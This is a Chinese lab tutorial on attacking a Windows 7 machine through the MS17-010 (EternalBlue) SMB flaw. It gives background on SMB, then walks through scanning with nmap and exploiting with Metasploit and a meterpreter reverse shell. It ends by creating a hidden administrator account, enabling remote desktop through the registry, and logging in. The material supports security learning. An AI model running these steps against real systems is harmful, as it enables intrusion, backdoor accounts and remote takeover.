MS17-010---利用“永恒之蓝”漏洞攻击 win7主机

本文主要是介绍MS17-010---利用“永恒之蓝”漏洞攻击 win7主机，希望对大家解决编程问题提供一定的参考价值，需要的开发者们随着小编来一起学习吧！

免责声明:本文仅做技术交流与学习....

目录

一.前置知识

1.何为永恒之蓝？

2.什么是SMB协议？

3.SMB工作原理是什么？

二、实验环境

三、实验步骤

nmap扫描

msf一把梭哈

shell执行命令

远程连接

一．

二．

---

一.前置知识

1.何为永恒之蓝？

        永恒之蓝（Eternal Blue）爆发于2017年4月14日晚，是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限，以此来控制被入侵的计算机。甚至于2017年5月12日， 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒，使全世界大范围内遭受了该勒索病毒，甚至波及到学校、大型企业、政府等机构，只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。

2.什么是SMB协议？

        SMB（全称是Server Message Block）是一个协议服务器信息块，它是一种客户机/服务器、请求/响应协议，通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源，电脑上的网上邻居就是靠SMB实现的；SMB协议工作在应用层和会话层，可以用在TCP/IP协议之上，SMB使用TCP139端口和TCP445端口。

3.SMB工作原理是什么？

     （1）：首先客户端发送一个SMB negport 请求数据报，，并列出它所支持的所有SMB的协议版本。服务器收到请求消息后响应请求，并列出希望使用的SMB协议版本。如果没有可以使用的协议版本则返回0XFFFFH，结束通信。

     （2）：协议确定后，客户端进程向服务器发起一个用户或共享的认证，这个过程是通过发送SessetupX请求数据包实现的。客户端发送一对用户名和密码或一个简单密码到服务器，然后通过服务器发送一个SessetupX应答数据包来允许或拒绝本次连接。

      （3）：当客户端和服务器完成了磋商和认证之后，它会发送一个Tcon或TconX SMB数据报并列出它想访问的网络资源的名称，之后会发送一个TconX应答数据报以表示此次连接是否接收或拒绝。

      （4）：连接到相应资源后，SMB客户端就能够通过open SMB打开一个文件，通过read SMB读取文件，通过write SMB写入文件，通过close SMB关闭文件。

---

二、实验环境

攻击机器：Kali

依赖工具：MSF、nmap

靶机：win7

---

三、实验步骤

Win7永恒之蓝漏洞步骤

nmap扫描

打开win7，发现密码都不知道。（然后用nmap扫描，看靶机是否存在漏洞，存在可利用漏洞进行操作。）

打开kali，进入终端，输入sudo su root进入管理员。

Ifconfig        -->进行查询kali的ip地址。

nmap 网段à进行网段扫描，得到靶机的ip地址。

nmap –script=vuln 靶机的ip地址à得出靶机是否存在漏洞.

由此看到存在编号为：ms17_010的漏洞，所以接下来进行漏洞利用。

msf一把梭哈

msfconsole--->指令进入控制台。

search ms17_010         -->搜索漏洞编号。

use 0        -->进行爆破。

show options        --->查看配置。

set RHOSTS 靶机ip地址        -->配置靶机的ip地址。

set payload windows/x64/meterpreter/reverse_tcp        -->配置要攻击的系统。

exploit        --->进行爆破。

-->显示meterpreter说明成功进入靶机。

shell执行命令

shell        --->成功进入服务端。

net user 账号 密码 /add        -->进行设置新用户的账号密码。

net localgroup administrators 账号 /add               --->将建立的新账号列入管理员权限。

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d   00000000 /f        -->输入此命令打开远程权限。

远程连接

至此

有两种方法，选择一种即可。

一．

自己电脑的搜索栏里搜索：远程桌面连接。

输入靶机的ip地址。（检查一下用户名是你刚刚自己新创建的。）

点击：连接。

输入刚刚创建的密码即可。

 

二．

再打开一个新新的终端àrdesktop 靶机ip地址        -->进行远程桌面。

远程桌面开启后，选择其它用户登录，输入刚才新创建的账号密码登录即可。

---

这篇关于MS17-010---利用“永恒之蓝”漏洞攻击 win7主机的文章就介绍到这儿，希望我们推荐的文章对编程师们有所帮助！

---